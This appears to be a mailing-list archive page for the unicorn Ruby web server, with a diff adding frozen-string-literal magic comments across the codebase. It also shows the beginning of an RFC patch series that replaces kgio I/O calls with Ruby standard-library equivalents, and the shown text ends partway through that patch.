 lib/unicorn/util.rb                 | 1 +
 lib/unicorn/worker.rb               | 1 +
 setup.rb                            | 1 +
 t/broken-app.ru                     | 1 +
 t/client_body_buffer_size.ru        | 1 +
 t/detach.ru                         | 1 +
 t/env.ru                            | 1 +
 t/fails-rack-lint.ru                | 1 +
 t/heartbeat-timeout.ru              | 1 +
 t/integration.ru                    | 1 +
 t/listener_names.ru                 | 1 +
 t/oob_gc.ru                         | 1 +
 t/oob_gc_path.ru                    | 1 +
 t/pid.ru                            | 1 +
 t/preread_input.ru                  | 1 +
 t/reopen-logs.ru                    | 1 +
 t/t0013.ru                          | 1 +
 t/t0014.ru                          | 1 +
 t/t0301.ru                          | 1 +
 test/aggregate.rb                   | 1 +
 test/benchmark/dd.ru                | 1 +
 test/benchmark/ddstream.ru          | 1 +
 test/benchmark/readinput.ru         | 1 +
 test/benchmark/stack.ru             | 1 +
 test/exec/test_exec.rb              | 1 +
 test/test_helper.rb                 | 1 +
 test/unit/test_ccc.rb               | 1 +
 test/unit/test_configurator.rb      | 1 +
 test/unit/test_droplet.rb           | 1 +
 test/unit/test_http_parser.rb       | 1 +
 test/unit/test_http_parser_ng.rb    | 1 +
 test/unit/test_request.rb           | 1 +
 test/unit/test_server.rb            | 1 +
 test/unit/test_signals.rb           | 1 +
 test/unit/test_socket_helper.rb     | 1 +
 test/unit/test_stream_input.rb      | 1 +
 test/unit/test_tee_input.rb         | 1 +
 test/unit/test_util.rb              | 1 +
 test/unit/test_waiter.rb            | 1 +
 unicorn.gemspec                     | 1 +
 66 files changed, 66 insertions(+)

diff --git a/Rakefile b/Rakefile
index 37569ce..fe1588b 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # optional rake-compiler support in case somebody needs to cross compile
 begin
   mk = "ext/unicorn_http/Makefile"
diff --git a/bin/unicorn b/bin/unicorn
index 00c8464..af8353c 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 
diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index 354c1df..374fd8e 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 require 'fileutils'
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c1bae10..0baea26 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,3 @@
+# frozen_string_literal: false
 # see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/echo.ru b/examples/echo.ru
index e982180..453a5e6 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 #
 # Example application that echoes read data back to the HTTP client.
 # This emulates the old echo protocol people used to run.
diff --git a/examples/logger_mp_safe.rb b/examples/logger_mp_safe.rb
index 05ad3fa..f2c0500 100644
--- a/examples/logger_mp_safe.rb
+++ b/examples/logger_mp_safe.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Multi-Processing-safe monkey patch for Logger
 #
 # This monkey patch fixes the case where "preload_app true" is used and
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 46fd634..4f96ede 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d90bdc4..5bae830 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Sample verbose configuration file for Unicorn (not Rack)
 #
 # This configuration file documents many features of Unicorn
diff --git a/ext/unicorn_http/extconf.rb b/ext/unicorn_http/extconf.rb
index 11099cd..de896fe 100644
--- a/ext/unicorn_http/extconf.rb
+++ b/ext/unicorn_http/extconf.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'mkmf'
 
 have_func("rb_hash_clear", "ruby.h") or abort 'Ruby 2.0+ required'
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 564cb30..fb91679 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'etc'
 require 'stringio'
 require 'raindrops'
diff --git a/lib/unicorn/app/old_rails.rb b/lib/unicorn/app/old_rails.rb
index 1e8c41a..54b3e69 100644
--- a/lib/unicorn/app/old_rails.rb
+++ b/lib/unicorn/app/old_rails.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
diff --git a/lib/unicorn/app/old_rails/static.rb b/lib/unicorn/app/old_rails/static.rb
index 2257270..cf34e02 100644
--- a/lib/unicorn/app/old_rails/static.rb
+++ b/lib/unicorn/app/old_rails/static.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # This code is based on the original Rails handler in Mongrel
 # Copyright (c) 2005 Zed A. Shaw
diff --git a/lib/unicorn/cgi_wrapper.rb b/lib/unicorn/cgi_wrapper.rb
index d9b7fe5..fb43605 100644
--- a/lib/unicorn/cgi_wrapper.rb
+++ b/lib/unicorn/cgi_wrapper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 # This code is based on the original CGIWrapper from Mongrel
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index b21a01d..3c81596 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'logger'
 
 # Implements a simple DSL for configuring a unicorn server.
diff --git a/lib/unicorn/const.rb b/lib/unicorn/const.rb
index 33ab4ac..8032863 100644
--- a/lib/unicorn/const.rb
+++ b/lib/unicorn/const.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn::Const # :nodoc:
   # default TCP listen host address (0.0.0.0, all interfaces)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index ab3bd6e..a48dab7 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # no stable API here
 require 'unicorn_http'
diff --git a/lib/unicorn/http_response.rb b/lib/unicorn/http_response.rb
index 0ed0ae3..3634165 100644
--- a/lib/unicorn/http_response.rb
+++ b/lib/unicorn/http_response.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 # Writes a Rack response to your client using the HTTP/1.1 specification.
 # You use it by simply doing:
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index ed5bbf1..08fbe40 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # This is the process manager of Unicorn. This manages worker
 # processes which in turn handle the I/O and application process.
diff --git a/lib/unicorn/launcher.rb b/lib/unicorn/launcher.rb
index 78e8f39..bd3324e 100644
--- a/lib/unicorn/launcher.rb
+++ b/lib/unicorn/launcher.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # :enddoc:
 $stdout.sync = $stderr.sync = true
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index db9f2cb..efd9177 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Strongly consider https://github.com/tmm1/gctools if using Ruby 2.1+
 # It is built on new APIs in Ruby 2.1, so it is more intelligent than
diff --git a/lib/unicorn/preread_input.rb b/lib/unicorn/preread_input.rb
index 12eb3e8..c62cc09 100644
--- a/lib/unicorn/preread_input.rb
+++ b/lib/unicorn/preread_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 module Unicorn
 # This middleware is used to ensure input is buffered to memory
diff --git a/lib/unicorn/select_waiter.rb b/lib/unicorn/select_waiter.rb
index cb84aab..d11ea57 100644
--- a/lib/unicorn/select_waiter.rb
+++ b/lib/unicorn/select_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # fallback for non-Linux and Linux <4.5 systems w/o EPOLLEXCLUSIVE
 class Unicorn::SelectWaiter # :nodoc:
   def get_readers(ready, readers, timeout) # :nodoc:
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 06ec2b2..986932f 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :enddoc:
 require 'socket'
 
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 9246f73..23a9976 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # When processing uploads, unicorn may expose a StreamInput object under
 # "rack.input" of the Rack environment when
diff --git a/lib/unicorn/tee_input.rb b/lib/unicorn/tee_input.rb
index 2ccc2d9..b3c6535 100644
--- a/lib/unicorn/tee_input.rb
+++ b/lib/unicorn/tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Acts like tee(1) on an input input to provide a input-like stream
 # while providing rewindable semantics through a File/StringIO backing
diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 0bbf6ec..deecd80 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # :stopdoc:
 require 'tmpdir'
 
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index b826de4..f28d929 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'fcntl'
 module Unicorn::Util # :nodoc:
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index 4af31be..d2445d5 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require "raindrops"
 
 # This class and its members can be considered a stable interface
diff --git a/setup.rb b/setup.rb
index cf1abd9..96cf75a 100644
--- a/setup.rb
+++ b/setup.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 #
 # setup.rb
 #
diff --git a/t/broken-app.ru b/t/broken-app.ru
index d05d7ab..5966bff 100644
--- a/t/broken-app.ru
+++ b/t/broken-app.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # we do not want Rack::Lint or anything to protect us
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/client_body_buffer_size.ru b/t/client_body_buffer_size.ru
index 44161a5..1a0fb16 100644
--- a/t/client_body_buffer_size.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/detach.ru b/t/detach.ru
index bbd998e..8d35951 100644
--- a/t/detach.ru
+++ b/t/detach.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentType, "text/plain"
 fifo_path = ENV["TEST_FIFO"] or abort "TEST_FIFO not set"
 run lambda { |env|
diff --git a/t/env.ru b/t/env.ru
index 388412e..86c3cfa 100644
--- a/t/env.ru
+++ b/t/env.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ env.inspect << "\n" ] ] }
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
index 82bfb5f..8b8b5ec 100644
--- a/t/fails-rack-lint.ru
+++ b/t/fails-rack-lint.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This rack app returns an invalid status code, which will cause
 # Rack::Lint to throw an exception if it is present.  This
 # is used to check whether Rack::Lint is in the stack or not.
diff --git a/t/heartbeat-timeout.ru b/t/heartbeat-timeout.ru
index 3eeb5d6..ccc6a8e 100644
--- a/t/heartbeat-timeout.ru
+++ b/t/heartbeat-timeout.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 headers = { 'content-type' => 'text/plain' }
 run lambda { |env|
diff --git a/t/integration.ru b/t/integration.ru
index 888833a..6df481c 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -1,4 +1,5 @@
 #!ruby
+# frozen_string_literal: false
 # Copyright (C) unicorn hackers <unicorn-public@80x24.org>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
 
diff --git a/t/listener_names.ru b/t/listener_names.ru
index edb4e6a..f52c59b 100644
--- a/t/listener_names.ru
+++ b/t/listener_names.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 names = Unicorn.listener_names.inspect # rely on preload_app=true
diff --git a/t/oob_gc.ru b/t/oob_gc.ru
index 224cb06..2ae58a8 100644
--- a/t/oob_gc.ru
+++ b/t/oob_gc.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/oob_gc_path.ru b/t/oob_gc_path.ru
index 7f40601..5358222 100644
--- a/t/oob_gc_path.ru
+++ b/t/oob_gc_path.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'unicorn/oob_gc'
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
diff --git a/t/pid.ru b/t/pid.ru
index f5fd31f..b49b137 100644
--- a/t/pid.ru
+++ b/t/pid.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env| [ 200, {}, [ "#$$\n" ] ] }
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 18af221..5f68fe9 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 require 'digest/md5'
 require 'unicorn/preread_input'
 use Unicorn::PrereadInput
diff --git a/t/reopen-logs.ru b/t/reopen-logs.ru
index c39e8f6..488da85 100644
--- a/t/reopen-logs.ru
+++ b/t/reopen-logs.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, "text/plain"
 run lambda { |env|
diff --git a/t/t0013.ru b/t/t0013.ru
index 48a3a34..e425093 100644
--- a/t/t0013.ru
+++ b/t/t0013.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0014.ru b/t/t0014.ru
index b0bd2b7..686d214 100644
--- a/t/t0014.ru
+++ b/t/t0014.ru
@@ -1,4 +1,5 @@
 #\ -E none
+# frozen_string_literal: false
 use Rack::ContentLength
 use Rack::ContentType, 'text/plain'
 app = lambda do |env|
diff --git a/t/t0301.ru b/t/t0301.ru
index ce68213..54929b1 100644
--- a/t/t0301.ru
+++ b/t/t0301.ru
@@ -1,4 +1,5 @@
 #\-N --debug
+# frozen_string_literal: false
 run(lambda do |env|
   case env['PATH_INFO']
   when '/vars'
diff --git a/test/aggregate.rb b/test/aggregate.rb
index 5eebbe5..0f32b2f 100755
--- a/test/aggregate.rb
+++ b/test/aggregate.rb
@@ -1,5 +1,6 @@
 #!/usr/bin/ruby -n
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 BEGIN { $tests = $assertions = $failures = $errors = 0 }
 
diff --git a/test/benchmark/dd.ru b/test/benchmark/dd.ru
index 111fa2e..5bd2739 100644
--- a/test/benchmark/dd.ru
+++ b/test/benchmark/dd.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This benchmark is the simplest test of the I/O facilities in
 # unicorn.  It is meant to return a fixed-sized blob to test
 # the performance of things in Unicorn, _NOT_ the app.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
index b14c973..fd40ced 100644
--- a/test/benchmark/ddstream.ru
+++ b/test/benchmark/ddstream.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP responses with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/readinput.ru b/test/benchmark/readinput.ru
index c91bec3..95c0226 100644
--- a/test/benchmark/readinput.ru
+++ b/test/benchmark/readinput.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # This app is intended to test large HTTP requests with or without
 # a fully-buffering reverse proxy such as nginx. Without a fully-buffering
 # reverse proxy, unicorn will be unresponsive when client count exceeds
diff --git a/test/benchmark/stack.ru b/test/benchmark/stack.ru
index fc9193f..17a565b 100644
--- a/test/benchmark/stack.ru
+++ b/test/benchmark/stack.ru
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 run(lambda { |env|
   body = "#{caller.size}\n"
   h = {
diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 8494452..807f724 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 # Don't add to this file, new tests are in Perl 5. See t/README
 FLOCK_PATH = File.expand_path(__FILE__)
 require './test/test_helper'
diff --git a/test/test_helper.rb b/test/test_helper.rb
index d86f83b..0bf3c90 100644
--- a/test/test_helper.rb
+++ b/test/test_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
index f518230..a0a2bff 100644
--- a/test/unit/test_ccc.rb
+++ b/test/unit/test_ccc.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'socket'
 require 'unicorn'
 require 'io/wait'
diff --git a/test/unit/test_configurator.rb b/test/unit/test_configurator.rb
index 1298f0e..1a89aca 100644
--- a/test/unit/test_configurator.rb
+++ b/test/unit/test_configurator.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'tempfile'
diff --git a/test/unit/test_droplet.rb b/test/unit/test_droplet.rb
index 81ad82b..4b2d2d0 100644
--- a/test/unit/test_droplet.rb
+++ b/test/unit/test_droplet.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 
diff --git a/test/unit/test_http_parser.rb b/test/unit/test_http_parser.rb
index 697af44..adcc84f 100644
--- a/test/unit/test_http_parser.rb
+++ b/test/unit/test_http_parser.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 425d5ad..fd47246 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'digest/md5'
diff --git a/test/unit/test_request.rb b/test/unit/test_request.rb
index 53ae944..9d1b350 100644
--- a/test/unit/test_request.rb
+++ b/test/unit/test_request.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_server.rb b/test/unit/test_server.rb
index 7ffa48f..5a2252f 100644
--- a/test/unit/test_server.rb
+++ b/test/unit/test_server.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2005 Zed A. Shaw
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 6c48754..49ff3c7 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 # Copyright (c) 2009 Eric Wong
 # You can redistribute it and/or modify it under the same terms as Ruby 1.8 or
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index a446f06..4363474 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_stream_input.rb b/test/unit/test_stream_input.rb
index 7986ca7..7ee98e4 100644
--- a/test/unit/test_stream_input.rb
+++ b/test/unit/test_stream_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_tee_input.rb b/test/unit/test_tee_input.rb
index 607ce87..8f05c77 100644
--- a/test/unit/test_tee_input.rb
+++ b/test/unit/test_tee_input.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require 'test/unit'
 require 'digest/sha1'
diff --git a/test/unit/test_util.rb b/test/unit/test_util.rb
index bc7b233..ce53b86 100644
--- a/test/unit/test_util.rb
+++ b/test/unit/test_util.rb
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 
 require './test/test_helper'
 require 'tempfile'
diff --git a/test/unit/test_waiter.rb b/test/unit/test_waiter.rb
index 0995de2..a20994b 100644
--- a/test/unit/test_waiter.rb
+++ b/test/unit/test_waiter.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 require 'test/unit'
 require 'unicorn'
 require 'unicorn/select_waiter'
diff --git a/unicorn.gemspec b/unicorn.gemspec
index e7e3ef7..36700a8 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -1,4 +1,5 @@
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 manifest = File.exist?('.manifest') ?
   IO.readlines('.manifest').map!(&:chomp!) : `git ls-files`.split("\n")
 

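The magic comment added throughout the diff above controls whether string literals in that file are frozen. unicorn mutates string buffers in place, hence the explicit `false`. A minimal sketch of the difference (standalone, not from the patch):

```ruby
# frozen_string_literal: false
# With the magic comment set to false (or absent), literals stay
# mutable, so in-place appends like the buffer reuse in unicorn work:
buf = ''
buf << 'hello'            # mutates the literal-backed string in place
raise 'unexpected' if buf.frozen?

# Under `# frozen_string_literal: true`, the same `buf << 'hello'`
# would raise FrozenError instead.
puts buf
```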
^ permalink raw reply related	[relevance 1%]

* [RFC 0-3/3] depend on Ruby 2.5+, eliminate kgio
@ 2023-09-05  9:44  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2023-09-05  9:44 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 1658 bytes --]

The explanation (and the bulk of the work) is in patch 2/3.

I wrote patch 1/3 over 4 years ago since it was simple and
didn't rely on "newer" Ruby 2.3 features.  Patch 2/3 completes
the change and actually depends on 2.5+; while patch 3/3 updates
the gemspec, docs and dependencies for Ruby 2.5+.

I haven't actually used Ruby 2.5 in a while, but I'm still on
Ruby 2.7 since that's what I have in Debian bullseye
(oldstable).

Patch 2/3 could use an extra set of eyes since it's fairly big,
but passes all tests.

Note: I can't benchmark anything since I have limited (shared)
hardware.

Eric Wong (3):
  remove kgio from all read(2) and write(2) wrappers
  kill off remaining kgio uses
  update dependency to Ruby 2.5+

 HACKING                         |  2 +-
 README                          |  2 +-
 lib/unicorn.rb                  |  3 +-
 lib/unicorn/http_request.rb     | 18 ++++-----
 lib/unicorn/http_server.rb      | 38 +++++++----------
 lib/unicorn/oob_gc.rb           |  4 +-
 lib/unicorn/socket_helper.rb    | 50 +++--------------------
 lib/unicorn/stream_input.rb     | 20 +++++----
 lib/unicorn/worker.rb           | 10 ++---
 lib/unicorn/write_splat.rb      |  7 ----
 t/README                        |  2 +-
 t/oob_gc.ru                     |  3 --
 t/oob_gc_path.ru                |  3 --
 test/unit/test_request.rb       | 47 ++++++++-------------
 test/unit/test_socket_helper.rb | 72 +++++++--------------------------
 test/unit/test_stream_input.rb  |  2 +-
 test/unit/test_tee_input.rb     |  2 +-
 unicorn.gemspec                 |  5 +--
 18 files changed, 87 insertions(+), 203 deletions(-)
 delete mode 100644 lib/unicorn/write_splat.rb

[-- Attachment #2: 0001-remove-kgio-from-all-read-2-and-write-2-wrappers.patch --]
[-- Type: text/x-diff, Size: 5330 bytes --]

From 36ba7f971c571031101c0b718724bdcb06dd7e03 Mon Sep 17 00:00:00 2001
From: Eric Wong <e@80x24.org>
Date: Sun, 26 May 2019 22:15:44 +0000
Subject: [RFC 1/3] remove kgio from all read(2) and write(2) wrappers

It's fairly easy given unicorn was designed with synchronous I/O
in mind.  The overhead of backtraces from EOFError on
readpartial should be rare given our requirement to only accept
requests from fast, reliable clients on LAN (e.g. nginx or
yet-another-horribly-named-server).
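A rough sketch of the kgio-to-stdlib mapping this patch applies (the pipe here is illustrative; the patch operates on client sockets): `kgio_read!` becomes `readpartial` (raises EOFError at EOF), and `kgio_tryread`/`kgio_trywrite` become `read_nonblock`/`write_nonblock` with `exception: false` (which return `:wait_readable`/`:wait_writable` instead of raising, and `nil` at EOF):

```ruby
r, w = IO.pipe
w.write('.')

# data available: returns the bytes read
p r.read_nonblock(11, exception: false)  # => "."

# nothing pending: returns :wait_readable rather than raising
p r.read_nonblock(11, exception: false)  # => :wait_readable

w.close
# at EOF, read_nonblock(exception: false) returns nil...
p r.read_nonblock(11, exception: false)  # => nil
# ...while readpartial raises EOFError, which the patch rescues
begin
  r.readpartial(11)
rescue EOFError
  puts 'EOFError'
end
```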
---
 lib/unicorn/http_request.rb |  4 ++--
 lib/unicorn/http_server.rb  |  8 +++++---
 lib/unicorn/stream_input.rb | 20 ++++++++++++--------
 lib/unicorn/worker.rb       |  4 ++--
 4 files changed, 21 insertions(+), 15 deletions(-)

diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index e3ad592..8bca60a 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -74,11 +74,11 @@ def read(socket)
     e['REMOTE_ADDR'] = socket.kgio_addr
 
     # short circuit the common case with small GET requests first
-    socket.kgio_read!(16384, buf)
+    socket.readpartial(16384, buf)
     if parse.nil?
       # Parser is not done, queue up more data to read and continue parsing
       # an Exception thrown from the parser will throw us out of the loop
-      false until add_parse(socket.kgio_read!(16384))
+      false until add_parse(socket.readpartial(16384))
     end
 
     check_client_connection(socket) if @@check_client_connection
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f1b4a54..2f1eb1b 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -389,12 +389,13 @@ def master_sleep(sec)
     # the Ruby itself and not require a separate malloc (on 32-bit MRI 1.9+).
     # Most reads are only one byte here and uncommon, so it's not worth a
     # persistent buffer, either:
-    @self_pipe[0].kgio_tryread(11)
+    @self_pipe[0].read_nonblock(11, exception: false)
   end
 
   def awaken_master
     return if $$ != @master_pid
-    @self_pipe[1].kgio_trywrite('.') # wakeup master process from select
+    # wakeup master process from select
+    @self_pipe[1].write_nonblock('.', exception: false)
   end
 
   # reaps all unreaped workers
@@ -565,7 +566,8 @@ def handle_error(client, e)
       500
     end
     if code
-      client.kgio_trywrite(err_response(code, @request.response_start_sent))
+      code = err_response(code, @request.response_start_sent)
+      client.write_nonblock(code, exception: false)
     end
     client.close
   rescue
diff --git a/lib/unicorn/stream_input.rb b/lib/unicorn/stream_input.rb
index 41d28a0..9246f73 100644
--- a/lib/unicorn/stream_input.rb
+++ b/lib/unicorn/stream_input.rb
@@ -49,8 +49,7 @@ def read(length = nil, rv = '')
         to_read = length - @rbuf.size
         rv.replace(@rbuf.slice!(0, @rbuf.size))
         until to_read == 0 || eof? || (rv.size > 0 && @chunked)
-          @socket.kgio_read(to_read, @buf) or eof!
-          filter_body(@rbuf, @buf)
+          filter_body(@rbuf, @socket.readpartial(to_read, @buf))
           rv << @rbuf
